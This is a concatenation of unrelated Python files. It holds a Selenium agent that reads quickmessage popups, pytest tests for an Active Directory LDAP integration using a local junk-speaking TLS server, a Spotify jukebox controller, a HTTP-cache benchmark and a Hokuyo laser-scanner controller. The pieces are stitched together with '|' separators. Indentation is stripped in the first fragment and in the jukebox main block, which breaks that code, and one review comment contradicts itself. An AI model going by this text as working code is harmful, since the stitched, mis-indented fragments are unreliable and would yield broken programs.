            res.append(Task(element.find_element(by=By.CLASS_NAME, value="c_title").text,
                            element.find_element(by=By.CLASS_NAME, value="c_source").text,
                            element.get_property("sort") == "2", self, self))
        return res
def tasks_getByTitle(self, title: str) -> List[Task]:
def f(task: Task) -> bool:
return task.title == title
return list(filter(f, self.tasks_list()))
def tasks_getByAuthor(self, author: str) -> List[Task]:
def f(task: Task) -> bool:
return task.made_by == author
return list(filter(f, self.tasks_list()))
def tasks_getByDone(self, done: bool) -> List[Task]:
def f(task: Task) -> bool:
return task.done is done
return list(filter(f, self.tasks_list()))
@cache.cached()
def eventloop(self) -> threading.Thread:
thread = threading.Thread(target=self._eventloop, daemon=True)
thread.start()
return thread
def _eventloop(self):
self.events.on_event("new_window", self._handler_new_window)
last_window = self.driver.current_window_handle
last_url = self.driver.current_url
last_title = self.driver.title
while True:
time.sleep(self.maw)
# Window Changed
if (self.driver.current_window_handle, self.driver.title, self.driver.current_url,) != (
last_window, last_title, last_url,):
last_window = self.driver.current_window_handle
last_url = self.driver.current_url
last_title = self.driver.title
self.events.cause("status_changed",
status={"window": self.driver.current_window_handle, "title": self.driver.title,
"url": self.driver.current_url})
# New Windows
all = self.parent.driver.window_handles
all.remove(self.parent.mainwin)
for i in self.parent.genwins:
try:
all.remove(i)
except:
pass
for i in self.parent.foundwins:
try:
all.remove(i)
except:
pass
if len(all) > 0 and not self.acting:
self.acting = True
new = all.pop()
self.foundwins.append(new)
self.driver.switch_to.window(new)
time.sleep(self.maw)
self.events.cause("new_window", window=self.driver.current_window_handle, title=self.driver.title,
url=self.driver.current_url)
utils.extra.use_main(self)
self.acting = False
# Quicks
if not self.acting and len(self.quicks) > 0:
self.acting = True
quick = self.quicks.pop()
self.driver.switch_to.window(quick["window"])
time.sleep(self.maw)
text = self.driver.find_element(by=By.XPATH, value='//*[@id="main_content"]/p').text
name = self.driver.find_element(by=By.XPATH,
value='//*[@id="main_content"]/table/tbody/tr[1]/td[2]/span').text
mail = self.driver.find_element(by=By.XPATH,
value='//*[@id="main_content"]/table/tbody/tr[1]/td[2]/span') \
.get_attribute("html_title")
send_time = self.driver.find_element(by=By.XPATH,
value='//*[@id="main_content"]/table/tbody/tr[2]/td[2]').text
self.events.cause("quick_received", text=text, name=name, mail=mail, send_time=send_time)
self.driver.close()
utils.extra.use_main(self)
self.acting = False
    def _handler_new_window(self, window, title, url):
        # Track quickmessage popups so the event loop can read them out later.
        if "Quickmessage lesen" in title:
            self.quicks.append({"window": window, "title": title, "url": url})
    def __repr__(self):
        """Debug representation -- same as str()."""
        return str(self)
    def __str__(self):
        """Readable summary with URL and user; the password is never included."""
        return f"Agent(url={repr(self.URL)}, user={repr(self.USER)})"
def __exit__(self):
return self.__del__()
def __del__(self):
try:
if len(self.driver.window_handles) != 0:
self.driver.close()
except selenium.common.exceptions.InvalidSessionIdException:
return False
except selenium.common.exceptions.WebDriverException:
return False
return True
|
Active_Directory_Query_test.py | import demistomock as demisto
from Active_Directory_Query import main, group_dn
import socket
import ssl
from threading import Thread
import time
import os
import pytest
import json
from IAMApiModule import *
from unittest.mock import patch
BASE_TEST_PARAMS = {
'server_ip': '127.0.0.1',
'secure_connection': 'None',
'page_size': '500',
'credentials': {'identifier': 'bad', 'password': 'bad'}
}
RETURN_ERROR_TARGET = 'Active_Directory_Query.return_error'
def test_bad_host_no_ssl(mocker):
    """main() against an unreachable host must report a short access error."""
    mocker.patch.object(demisto, 'params', return_value=BASE_TEST_PARAMS)
    return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
    assert demisto.params().get('server_ip') == '127.0.0.1'  # sanity-check the mock
    main()
    assert return_error_mock.call_count == 1
    # call_args is the last call: a tuple of positional args and kwargs
    err_msg = return_error_mock.call_args[0][0]
    assert len(err_msg) < 100
    assert 'Failed to access' in err_msg
@pytest.mark.filterwarnings("ignore::ResourceWarning")
def test_bad_ssl(mocker):
    """A non-LDAP host over SSL must produce a short 'SSL error' message."""
    params = BASE_TEST_PARAMS.copy()
    params['server_ip'] = '185.199.108.153'  # disable-secrets-detection
    params['secure_connection'] = 'SSL'
    params['port'] = 443
    mocker.patch.object(demisto, 'params', return_value=params)
    return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
    mocker.patch.object(demisto, "info")
    assert demisto.params().get('secure_connection') == 'SSL'  # sanity-check the mock
    main()
    assert return_error_mock.call_count == 1
    # call_args is the last call: a tuple of positional args and kwargs
    err_msg = return_error_mock.call_args[0][0]
    assert len(err_msg) < 100
    assert 'Failed to access' in err_msg
    assert 'SSL error' in err_msg
def ssl_bad_socket_server(port):
    """One-shot TLS server that speaks garbage instead of LDAP (test helper)."""
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    # cert and keyfile generated with
    # openssl req -x509 -nodes -days 3000 -newkey rsa:2048 -keyout key.pem -out cert.pem
    try:
        context.load_cert_chain('cert.pem', 'key.pem')
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as sock:
            sock.bind(('127.0.0.1', port))
            sock.listen(5)
            with context.wrap_socket(sock, server_side=True) as ssock:
                try:
                    conn, addr = ssock.accept()
                except ssl.SSLError as err:
                    if 'TLSV1_ALERT_UNKNOWN_CA' in str(err):
                        # all is ok. client refused our cert
                        return
                    raise
                conn.recv(32)
                # flood the client with a large non-protocol payload
                msg = b'THIS IS A TEST SERVER WHICH IGNORES PROTOCOL\n\n'
                for x in range(10):
                    msg += msg  # doubles each pass: 46 bytes -> ~47 KB
                conn.send(msg)
                conn.shutdown(socket.SHUT_RDWR)
                conn.close()
    except Exception as ex:
        # fail the surrounding test instead of dying silently on the thread
        pytest.fail("Failed starting ssl_bad_socket_server: {}".format(ex))
        raise
@pytest.mark.filterwarnings("ignore::ResourceWarning")
def test_faulty_server(mocker):
    """A server that violates the protocol must yield a short access error."""
    port = 9638
    server_thread = Thread(target=ssl_bad_socket_server, args=(port,))
    server_thread.start()
    time.sleep(1)  # wait for socket server to startup
    params = BASE_TEST_PARAMS.copy()
    params['server_ip'] = '127.0.0.1'  # disable-secrets-detection
    params['secure_connection'] = 'SSL'
    params['unsecure'] = True
    params['port'] = port
    mocker.patch.object(demisto, 'params', return_value=params)
    return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
    assert demisto.params().get('secure_connection') == 'SSL'  # sanity-check the mock
    main()
    server_thread.join(5)
    assert return_error_mock.call_count == 1
    # call_args is the last call: a tuple of positional args and kwargs
    err_msg = return_error_mock.call_args[0][0]
    assert len(err_msg) < 100
    assert 'Failed to access' in err_msg
def test_ssl_custom_cert(mocker, request):
    """With our cert trusted via SSL_CERT_FILE the failure must NOT be an SSL error."""
    ENV_KEY = 'SSL_CERT_FILE'
    # trust the test server's self-signed certificate for this test only
    os.environ[ENV_KEY] = 'cert.pem'

    def cleanup():
        os.environ.pop(ENV_KEY)

    request.addfinalizer(cleanup)
    port = 9637
    t = Thread(target=ssl_bad_socket_server, args=(port,))
    t.start()
    time.sleep(1)  # wait for socket server to startup
    params = BASE_TEST_PARAMS.copy()
    params['server_ip'] = '127.0.0.1'  # disable-secrets-detection
    params['secure_connection'] = 'SSL'
    params['port'] = port
    mocker.patch.object(demisto, 'params',
                        return_value=params)
    return_error_mock = mocker.patch(RETURN_ERROR_TARGET)
    # validate our mock of params
    assert demisto.params().get('secure_connection') == 'SSL'
    main()
    t.join(5)
    assert return_error_mock.call_count == 1
    # call_args last call with a tuple of args list and kwargs
    err_msg = return_error_mock.call_args[0][0]
    assert len(err_msg) < 100
    assert 'Failed to access' in err_msg
    # handshake succeeded, so the error must come from the protocol, not SSL
    assert 'SSL error' not in err_msg
def test_endpoint_entry():
    """
    Given:
        A computer object and a custom-attributes filter of ['*'].
    When:
        endpoint_entry builds the endpoint entry.
    Then:
        Every attribute of the computer object appears in the entry, since
        '*' disables filtering.
    """
    from Active_Directory_Query import endpoint_entry
    raw_computer_object = {'dn': 'dn', 'name': 'name', 'memberOf': 'memberOf'}
    entry = endpoint_entry(raw_computer_object, ['*'])
    assert entry == {'Groups': 'memberOf', 'Hostname': 'name', 'ID': 'dn', 'Type': 'AD'}
def get_outputs_from_user_profile(user_profile):
    """Return the ``Contents`` section of a user profile's entry context."""
    return user_profile.to_entry().get('Contents')
def mock_demisto_map_object(object, mapper_name, incident_type):
    """Stand-in for demisto.mapObject: derive AD fields from the email address.

    The part of the email before the '@' is used for every name-like field;
    the OU is fixed. ``mapper_name`` and ``incident_type`` are ignored.
    """
    email = object.get('email')
    prefix, _, _ = email.partition('@')
    mapped = {field: prefix for field in ('cn', 'sAMAccountName', 'userPrincipalName')}
    mapped['mail'] = email
    mapped['ou'] = "OU=Americas,OU=Demisto"
    return mapped
def test_get_iam_user_profile(mocker):
    """get_iam_user_profile should map the profile and surface its sAMAccountName."""
    from Active_Directory_Query import get_iam_user_profile
    mocker.patch.object(demisto, 'mapObject', side_effect=mock_demisto_map_object)
    profile = {
        "email": "test2@paloaltonetworks.com",
        "username": "test",
        "locationregion": "Americas",
        "olduserdata": {
            "email": "test@paloaltonetworks.com",
            "username": "test",
            "locationregion": "Americas",
        },
    }
    _, ad_user, sam_account_name = get_iam_user_profile(profile, 'mock_mapper_out')
    assert sam_account_name == 'test'
    assert ad_user
def test_update_user_iam__username_change(mocker):
    """
    Given:
        A user profile whose 'olduserdata' email differs from the new email
        (a rename), with a valid mapping.
    When:
        Running `update_user_iam`.
    Then:
        The update succeeds and the outputs reflect the new email/username.
    """
    import Active_Directory_Query
    # captures the arguments ConnectionMocker.add() is called with
    add_args, add_kwargs = [], {}
    class ConnectionMocker:
        # minimal stand-in for an ldap3 Connection
        entries = []
        result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}}
        def search(self, *args, **kwargs):
            return
        def add(self, *args, **kwargs):
            # record what the integration tried to add
            nonlocal add_args, add_kwargs
            add_args, add_kwargs = args, kwargs
            return True
        def modify(self, *args, **kwargs):
            return True
        def modify_dn(self, *args, **kwargs):
            return True
    Active_Directory_Query.conn = ConnectionMocker()
    # 'olduserdata' marks this as an update of an existing user (rename flow)
    args = {"user-profile": json.dumps({"email": "test2@paloaltonetworks.com", "username": "test",
                                        "locationregion": "Americas",
                                        "olduserdata": {"email": "test@paloaltonetworks.com", "username": "test",
                                                        "locationregion": "Americas"}})}
    mocker.patch.object(demisto, 'mapObject', side_effect=mock_demisto_map_object)
    mocker.patch('Active_Directory_Query.check_if_user_exists_by_attribute', return_value=True)
    mocker.patch('Active_Directory_Query.get_user_activity_by_samaccountname', return_value=True)
    mocker.patch('Active_Directory_Query.user_dn', return_value='mock_dn')
    user_profile = Active_Directory_Query.update_user_iam(
        default_base_dn='mock_base_dn',
        args=args,
        create_if_not_exists=False,
        mapper_out='mock_mapper_out',
        disabled_users_group_cn='mock_disabled_users_group_cn'
    )
    outputs = get_outputs_from_user_profile(user_profile)
    assert outputs.get('action') == IAMActions.UPDATE_USER
    assert outputs.get('success') is True
    assert outputs.get('email') == 'test2@paloaltonetworks.com'
    # presumably derived from the new email prefix by the mapper -- confirm
    assert outputs.get('username') == 'test2'
def test_create_user_iam(mocker):
    """
    Given:
        A valid user profile with valid mapping
    When:
        Running the `create_user_iam` command
    Then:
        The user was created successfully in AD.
    """
    import Active_Directory_Query
    # captures the arguments ConnectionMocker.add() is called with
    add_args, add_kwargs = [], {}
    class ConnectionMocker:
        # minimal stand-in for an ldap3 Connection
        entries = []
        result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}}
        def search(self, *args, **kwargs):
            return
        def add(self, *args, **kwargs):
            nonlocal add_args, add_kwargs
            add_args, add_kwargs = args, kwargs
            return True
    Active_Directory_Query.conn = ConnectionMocker()
    args = {"user-profile": json.dumps({"email": "test@paloaltonetworks.com", "username": "test",
                                        "locationregion": "Americas"})}
    # the user does not exist yet, so the create path is taken
    mocker.patch('Active_Directory_Query.check_if_user_exists_by_attribute', return_value=False)
    mocker.patch.object(IAMUserProfile, 'map_object', return_value={'cn': 'test', 'mail': 'test@paloaltonetworks.com',
                                                                    'sAMAccountName': 'test',
                                                                    'userPrincipalName': 'test',
                                                                    "ou": "OU=Americas,OU=Demisto"})
    user_profile = Active_Directory_Query.create_user_iam('', args, 'mapper_out', '')
    outputs = get_outputs_from_user_profile(user_profile)
    assert outputs.get('action') == IAMActions.CREATE_USER
    assert outputs.get('success') is True
    # the test pins that a freshly created user is reported inactive
    assert outputs.get('active') is False
    assert outputs.get('email') == 'test@paloaltonetworks.com'
def test_unseccsseful_create_user_iam_missing_ou(mocker):
    """
    Given:
        A user profile whose mapping is missing the 'ou' field.
    When:
        Running the `create_user_iam` command.
    Then:
        The user is not created in AD and an explanatory error is returned.
    """
    import Active_Directory_Query
    captured_args, captured_kwargs = [], {}
    class ConnectionMocker:
        entries = []
        result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}}
        def search(self, *args, **kwargs):
            return
        def add(self, *args, **kwargs):
            nonlocal captured_args, captured_kwargs
            captured_args, captured_kwargs = args, kwargs
            return True
    Active_Directory_Query.conn = ConnectionMocker()
    profile = {"email": "test@paloaltonetworks.com", "username": "test", "locationregion": "Americas"}
    args = {"user-profile": json.dumps(profile)}
    mocker.patch('Active_Directory_Query.check_if_user_exists_by_attribute', return_value=False)
    # note: the mapped object deliberately lacks an 'ou' entry
    mapped = {'cn': 'test', 'mail': 'test@paloaltonetworks.com',
              'sAMAccountName': 'test', 'userPrincipalName': 'test'}
    mocker.patch.object(IAMUserProfile, 'map_object', return_value=mapped)
    user_profile = Active_Directory_Query.create_user_iam('', args, 'mapper_out', '')
    outputs = get_outputs_from_user_profile(user_profile)
    assert outputs.get('action') == IAMActions.CREATE_USER
    assert outputs.get('success') is False
    assert outputs.get('email') == 'test@paloaltonetworks.com'
    assert 'User must have an Organizational Unit (OU)' in outputs.get('errorMessage')
def test_unseccsseful_create_user_iam_missing_samaccountname(mocker):
    """
    Given:
        A valid user profile with missing samaccountname in the mapping
    When:
        Running the `create_user_iam` command
    Then:
        - The user was not created in AD.
        - An error message was returned.
    """
    import Active_Directory_Query
    # captures the arguments ConnectionMocker.add() is called with
    add_args, add_kwargs = [], {}
    class ConnectionMocker:
        # minimal stand-in for an ldap3 Connection
        entries = []
        result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}}
        def search(self, *args, **kwargs):
            return
        def add(self, *args, **kwargs):
            nonlocal add_args, add_kwargs
            add_args, add_kwargs = args, kwargs
            return True
    Active_Directory_Query.conn = ConnectionMocker()
    args = {"user-profile": json.dumps({"email": "test@paloaltonetworks.com", "username": "test",
                                        "locationregion": "Americas"})}
    mocker.patch('Active_Directory_Query.check_if_user_exists_by_attribute', return_value=False)
    # the mapping intentionally lacks 'sAMAccountName'
    mocker.patch.object(IAMUserProfile, 'map_object', return_value={'cn': 'test', 'mail': 'test@paloaltonetworks.com',
                                                                    "ou": "OU=Americas,OU=Demisto",
                                                                    'userPrincipalName': 'test'})
    user_profile = Active_Directory_Query.create_user_iam('', args, 'mapper_out', '')
    outputs = get_outputs_from_user_profile(user_profile)
    assert outputs.get('action') == IAMActions.CREATE_USER
    assert outputs.get('success') is False
    assert outputs.get('email') == 'test@paloaltonetworks.com'
    assert 'User must have a sAMAccountName' in outputs.get('errorMessage')
def test_group_entry_no_custom_attributes():
    """
    Given:
        A group object and a custom-attributes filter of ['*'].
    When:
        group_entry builds the group entry.
    Then:
        Every attribute of the group object appears in the entry, since '*'
        disables filtering.
    """
    from Active_Directory_Query import group_entry
    raw_group = {'dn': 'dn', 'name': 'name', 'memberOf': 'memberOf'}
    entry = group_entry(raw_group, ['*'])
    assert entry == {'Groups': 'memberOf', 'ID': 'dn', 'Name': 'name', 'Type': 'AD'}
def test_group_entry():
    """
    Given:
        A group object and a custom-attributes filter naming 'displayName'.
    When:
        group_entry builds the group entry.
    Then:
        The standard fields plus the requested custom attribute are returned.
    """
    from Active_Directory_Query import group_entry
    raw_group = {'dn': 'dn', 'name': 'name', 'memberOf': 'memberOf',
                 'displayName': 'display name'}
    entry = group_entry(raw_group, ['displayName'])
    assert entry == {'Groups': 'memberOf', 'ID': 'dn', 'Name': 'name', 'Type': 'AD',
                     'displayName': 'display name'}
def test_search_group_members(mocker):
    """
    sanity test for search_group_members method

    Mocks the LDAP connection so the query returns one group entry, then
    verifies the exact demisto results structure that gets logged.
    """
    import Active_Directory_Query
    class EntryMocker:
        def entry_to_json(self):
            return '{"dn": "dn","attributes": {"memberOf": ["memberOf"], "name": ["name"]}}'
    class ConnectionMocker:
        entries = [EntryMocker()]
        result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}}
        def search(self, *args, **kwargs):
            # simulate a slow query so the time_limit logic is exercised
            time.sleep(1)
            return
    expected_results = {'ContentsFormat': 'json', 'Type': 1,
                        'Contents': [{'dn': 'dn', 'attributes': {'memberOf': ['memberOf'], 'name': ['name']}}],
                        'ReadableContentsFormat': 'markdown',
                        'HumanReadable': '### Active Directory - Get Group Members\n|'
                                         'dn|memberOf|name|\n|---|---|---|\n| dn | memberOf | name |\n',
                        'EntryContext': {'ActiveDirectory.Groups(obj.dn ==dn)': {'dn': 'dn', 'members': [
                            {'dn': 'dn', 'category': 'group'}]}, 'ActiveDirectory.Groups(obj.dn == val.dn)':
                            [{'dn': 'dn', 'memberOf': ['memberOf'], 'name': ['name']}], 'Group':
                            [{'Type': 'AD', 'ID': 'dn', 'Name': ['name'], 'Groups': ['memberOf']}]}}
    expected_results = f'demisto results: {json.dumps(expected_results, indent=4, sort_keys=True)}'
    mocker.patch.object(demisto, 'args',
                        return_value={'member-type': 'group', 'group-dn': 'dn', 'time_limit': '1'})
    Active_Directory_Query.conn = ConnectionMocker()
    # results are emitted through the logger, so assert on the log call
    with patch('logging.Logger.info') as mock:
        Active_Directory_Query.search_group_members('dc', 1)
        mock.assert_called_with(expected_results)
def test_group_dn_escape_characters():
    """
    Given:
        Group name with parentheses
    When:
        Running the function group_dn
    Then:
        The function search gets the group name after escape special characters.
    """
    import Active_Directory_Query
    class EntryMocker:
        def entry_to_json(self):
            return '{"dn": "dn","attributes": {"memberOf": ["memberOf"], "name": ["name"]}}'
    class ConnectionMocker:
        entries = [EntryMocker()]
        result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}}
    Active_Directory_Query.conn = ConnectionMocker()
    with patch('Active_Directory_Query.search', return_value=[EntryMocker()]) as mock:
        # NOTE(review): `group_dn` is called unqualified -- this only works if
        # the test module imports it at top level (not visible here); confirm,
        # or call Active_Directory_Query.group_dn instead.
        group_dn('group(group)', '')
        # '(' and ')' must be LDAP-escaped to \28 / \29 in the search filter
        mock.assert_called_with('(&(objectClass=group)(cn=group\\28group\\29))', '')
def test_search__no_control_exist(mocker):
    """
    Given:
        A search result without the paged-results 'controls' key.
    When:
        Running any search query.
    Then:
        The command reports 'no entries' instead of raising an exception.
    """
    import Active_Directory_Query
    class ConnectionMocker:
        entries = []
        result = {}  # deliberately missing the 'controls' key
        def search(self, *args, **kwargs):
            return
    mocker.patch.object(demisto, 'results')
    Active_Directory_Query.conn = ConnectionMocker()
    Active_Directory_Query.search_users('dc=test,dc=test_1', page_size=20)
    human_readable = demisto.results.call_args[0][0]['HumanReadable']
    assert '**No entries.**' in human_readable
def test_user_account_to_boolean_fields():
    """
    Given:
        a userAccountControl value of 0x50
    When:
        parsing the userAccountControl bit flags
    Then:
        only LOCKOUT and PASSWD_CANT_CHANGE are reported as set
    """
    import Active_Directory_Query
    flags = Active_Directory_Query.user_account_to_boolean_fields(0x50)
    enabled = {name for name, is_set in flags.items() if is_set}
    assert enabled == {'LOCKOUT', 'PASSWD_CANT_CHANGE'}
@pytest.mark.parametrize('flags', [512, 0, 544])
def test_restore_user(mocker, flags):
    """
    Given:
        A disabled user.
    When:
        Calling restore_user method.
    Then:
        Verify the existing flag is returned.
    """
    from Active_Directory_Query import restore_user
    # NOTE(review): the key 'flat' is presumably the shape restore_user reads
    # from search_with_paging, but it looks like a typo of 'flat'/'flags' --
    # confirm against the integration code.
    re_val = {'flat': [{'userAccountControl': [flags]}]}
    mocker.patch('Active_Directory_Query.search_with_paging', return_value=re_val)
    mocker.patch.object(demisto, 'args')
    # restore_user should return the user's current userAccountControl value
    assert restore_user('test_user', 0) == flags
def test_enable_user_with_restore_user_option(mocker):
    """
    Given:
        A disabled user.
    When:
        Calling enable_user method.
    Then:
        Verify the existing flag is returned with the disable bit off.
    """
    from Active_Directory_Query import enable_user
    # 546 = 544 | 2: the ACCOUNTDISABLE bit (0x2) set on top of other properties
    disabled_account_with_properties = 546
    enabled_account_with_properties = 544
    mocker.patch('Active_Directory_Query.restore_user', return_value=disabled_account_with_properties)
    mocker.patch('Active_Directory_Query.user_dn', return_value='test_dn')
    modify_data = mocker.patch('Active_Directory_Query.modify_object')
    mocker.patch.object(demisto, 'args')
    enable_user('test_user', 0)
    # the value written to userAccountControl must have the disable bit cleared
    assert modify_data.call_args.args[1].get('userAccountControl')[0][1] == enabled_account_with_properties
def test_search_with_paging_bug(mocker):
    """
    Given:
        page size larger than 1.
    When:
        running get-group-members command.
    Then:
        time_limit results returned.
    """
    import Active_Directory_Query
    class EntryMocker:
        def entry_to_json(self):
            return '{"dn": "dn","attributes": {"memberOf": ["memberOf"], "name": ["name"]}}'
    class ConnectionMocker:
        entries = []
        result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}}
        def search(self, *args, **kwargs):
            # produce one entry per requested page slot and take ~1s per page,
            # so a 3s time_limit should yield exactly 3 entries in total
            page_size = kwargs.get('paged_size')
            if page_size:
                self.entries = [EntryMocker() for i in range(page_size)]
            time.sleep(1)
            return
    mocker.patch.object(demisto, 'results')
    mocker.patch.object(demisto, 'args',
                        return_value={'member-type': 'group', 'group-dn': 'dn', 'time_limit': '3'})
    Active_Directory_Query.conn = ConnectionMocker()
    with patch('logging.Logger.info'):
        Active_Directory_Query.search_group_members('dc', 1)
    assert len(demisto.results.call_args[0][0]['Contents']) == 3
|
jukeboxController.py | __author__ = 'matt'
import threading
import spotify_wrapper
from redisBroker import RedisBroker
from time import sleep
from collections import deque
import requests
from sys import stdin
SERVER = 'pyply.j.layershift.co.uk'
SKIP_THRESHOLD = 3
class JukeboxController:
    """Drives Spotify playback from a rotating playlist and counts skip votes."""

    def __init__(self):
        self.playlist = None
        self.currentSkipCount = 0

    def addSkipVote(self):
        """Register one skip vote; advance the track once the threshold is met."""
        self.currentSkipCount += 1
        if self.currentSkipCount >= SKIP_THRESHOLD:
            self.goNextTrack()

    def togglePausePlayer(self):
        """Toggle between play and pause."""
        spotify_wrapper.play_pause()

    def pausePlayer(self):
        """Pause playback, but only if something is currently playing."""
        if spotify_wrapper.player_state() == 'playing':
            spotify_wrapper.play_pause()

    def goNextTrack(self):
        """Rotate the playlist: play its head track and move it to the back."""
        if not self.playlist:
            return
        self.currentSkipCount = 0
        track = self.playlist.popleft()
        self.playlist.append(track)
        spotify_wrapper.play_track(track)
        print('Now playing ' + track)

    def setPlaylist(self, pl):
        """Replace the playlist with a fresh rotating queue built from *pl*."""
        self.playlist = deque(pl)

    def spotifyController(self):
        """Poll the player once a second; start the next track when it stops."""
        while True:
            if self.playlist:
                if spotify_wrapper.player_state() == 'stopped':
                    self.goNextTrack()
            sleep(1)
if __name__ == "__main__":
#print('Enter Party ID:')
#partyId = stdin.readline()[:-1]
print "Using Party ID party"
partyId = "party"
jukebox = JukeboxController()
jukeThread = threading.Thread(name='SpotifyController', target=jukebox.spotifyController)
redisBroker = RedisBroker(jukebox)
brokerThread = threading.Thread(name='MessageListener', target=redisBroker.messageListener, args=(partyId,))
#r = requests.get('http://{}/party/{}'.format(SERVER, partyId))
#if r.status_code == 200 and r.json()['success'] and r.json()['playlist_prompt']:
#print('Enter Spotify playlist URI:')
#plist = stdin.readline()[:-1]
#r = requests.get('http://{}/playlist/{}/{}'.format(SERVER, partyId, plist))
jukeThread.start()
brokerThread.start()
jukeThread.join()
|
benchmark.py | import sys
import requests
import argparse
from multiprocessing import Process
from datetime import datetime
from wsgiref.simple_server import make_server
from cachecontrol import CacheControl
HOST = 'localhost'
PORT = 8050
URL = 'http://{0}:{1}/'.format(HOST, PORT)
class Server(object):
    """Minimal WSGI app that always answers a cacheable 200 'Hello World!'."""

    def __call__(self, env, sr):
        body = 'Hello World!'
        status = '200 OK'
        headers = [
            # cacheable for ten minutes so CacheControl can serve from cache
            ('Cache-Control', 'max-age=%i' % (60 * 10)),
            ('Content-Type', 'text/plain'),
        ]
        sr(status, headers)
        # PEP 3333: the app must return an iterable of *bytestrings*.
        # Returning the bare string made the server iterate it char by char
        # (and breaks outright on Python 3, where str is not bytes).
        return [body.encode('utf-8')]
def start_server():
    """Build the benchmark WSGI server on HOST:PORT and serve until killed."""
    make_server(HOST, PORT, Server()).serve_forever()
def run_benchmark(sess):
    """Time 1000 sequential GETs against the local benchmark server.

    Starts the WSGI server in a child process, issues the requests through
    *sess* (optionally wrapped by CacheControl), prints the elapsed time and
    finally terminates the server process.
    """
    proc = Process(target=start_server)
    proc.start()
    start = datetime.now()
    # `range` instead of `xrange`: works on both Python 2 and 3
    # (xrange is a NameError on Python 3)
    for i in range(0, 1000):
        sess.get(URL)
        sys.stdout.write('.')
    end = datetime.now()
    # explicit newline after the dots; bare `print()` would emit "()" on Python 2
    sys.stdout.write('\n')
    total = end - start
    print('Total time for 1000 requests: %s' % total)
    proc.terminate()
def run():
    """Parse CLI flags and run the benchmark, caching unless --no-cache is given."""
    parser = argparse.ArgumentParser()
    parser.add_argument('-n', '--no-cache',
                        default=False,
                        action='store_true',
                        help='Do not use cachecontrol')
    args = parser.parse_args()
    sess = requests.Session()
    # wrap the session with the HTTP cache unless explicitly disabled
    sess = sess if args.no_cache else CacheControl(sess)
    run_benchmark(sess)
if __name__ == '__main__':
    run()
|
hokuyo_controller.py | import logging
import logging.config
import sys
import threading
import traceback
import os
import serial
from amberdriver.common.message_handler import MessageHandler
from amberdriver.hokuyo import hokuyo_pb2
from amberdriver.hokuyo.hokuyo import Hokuyo
from amberdriver.null.null import NullController
from amberdriver.tools import serial_port, config
__author__ = 'paoolo'
pwd = os.path.dirname(os.path.abspath(__file__))
logging.config.fileConfig('%s/hokuyo.ini' % pwd)
config.add_config_ini('%s/hokuyo.ini' % pwd)
LOGGER_NAME = 'HokuyoController'
HIGH_SENSITIVE = config.HOKUYO_HIGH_SENSITIVE_ENABLE == 'True'
SPEED_MOTOR = int(config.HOKUYO_SPEED_MOTOR)
SERIAL_PORT = config.HOKUYO_SERIAL_PORT
BAUD_RATE = config.HOKUYO_BAUD_RATE
TIMEOUT = 0.3
class HokuyoController(MessageHandler):
    """Message handler exposing a Hokuyo laser scanner over the Amber protocol.

    Supports one-shot scans (get_single_scan) plus a subscription mode in
    which the driver's scanning loop stays enabled while at least one client
    is subscribed.
    """

    def __init__(self, pipe_in, pipe_out, driver):
        super(HokuyoController, self).__init__(pipe_in, pipe_out)
        self.__hokuyo = driver
        self.__logger = logging.getLogger(LOGGER_NAME)

    def handle_data_message(self, header, message):
        """Dispatch a data request; only get_single_scan is recognized."""
        if message.HasExtension(hokuyo_pb2.get_single_scan):
            self.__handle_get_single_scan(header, message)
        else:
            self.__logger.warning('No recognizable request in message')

    @MessageHandler.handle_and_response
    def __handle_get_single_scan(self, _received_header, _received_message, response_header, response_message):
        """Fill the response with one freshly acquired scan."""
        self.__logger.debug('Get single scan')
        angles, distances, timestamp = self.__hokuyo.get_single_scan()
        response_message = HokuyoController.__fill_scan(response_message, angles, distances, timestamp)
        return response_header, response_message

    def handle_subscribe_message(self, header, message):
        """Register the clients and make sure the scanner is running."""
        self.__logger.debug('Subscribe action')
        self.add_subscribers(header.clientIDs)
        self.__hokuyo.enable_scanning(True)

    def handle_unsubscribe_message(self, header, message):
        """Drop the given clients; stop scanning when nobody is left."""
        self.__logger.debug('Unsubscribe action for clients %s', str(header.clientIDs))
        # Explicit loop instead of map(): map() is lazy on Python 3, so the
        # original `map(self.remove_subscriber, header.clientIDs)` would
        # silently remove nothing there.
        for client_id in header.clientIDs:
            self.remove_subscriber(client_id)
        if not self.is_any_subscriber():
            self.__hokuyo.enable_scanning(False)

    def handle_client_died_message(self, client_id):
        """Remove a dead client; stop scanning when nobody is left."""
        self.__logger.info('Client %d died', client_id)
        self.remove_subscriber(client_id)
        if not self.is_any_subscriber():
            self.__hokuyo.enable_scanning(False)

    def fill_subscription_response(self, response_message):
        """Fill a subscription push message with the most recent scan."""
        angles, distances, timestamp = self.__hokuyo.get_scan()
        return HokuyoController.__fill_scan(response_message, angles, distances, timestamp)

    @staticmethod
    def __fill_scan(response_message, angles, distances, timestamp):
        # Populate the protobuf scan extension in place and return the message.
        response_message.Extensions[hokuyo_pb2.scan].angles.extend(angles)
        response_message.Extensions[hokuyo_pb2.scan].distances.extend(distances)
        response_message.Extensions[hokuyo_pb2.timestamp] = timestamp
        return response_message
if __name__ == '__main__':
    try:
        # Open the serial link to the scanner using settings from hokuyo.ini.
        _serial = serial.Serial(port=SERIAL_PORT, baudrate=BAUD_RATE, timeout=TIMEOUT)
        _serial_port = serial_port.SerialPort(_serial)
        # QT (quit) / RS (reset) to put the device into a known state.
        _serial.write('QT\nRS\nQT\n')
        # Drain whatever the device still has buffered so later replies parse cleanly.
        result = ''
        flushing = True
        while flushing:
            char = _serial.read()
            flushing = (char != '')
            result += char
        sys.stderr.write('\n===============\nFLUSH SERIAL PORT\n"%s"\n===============\n' % result)
        hokuyo = Hokuyo(_serial_port)
        # Log the device's responses to the initial configuration commands.
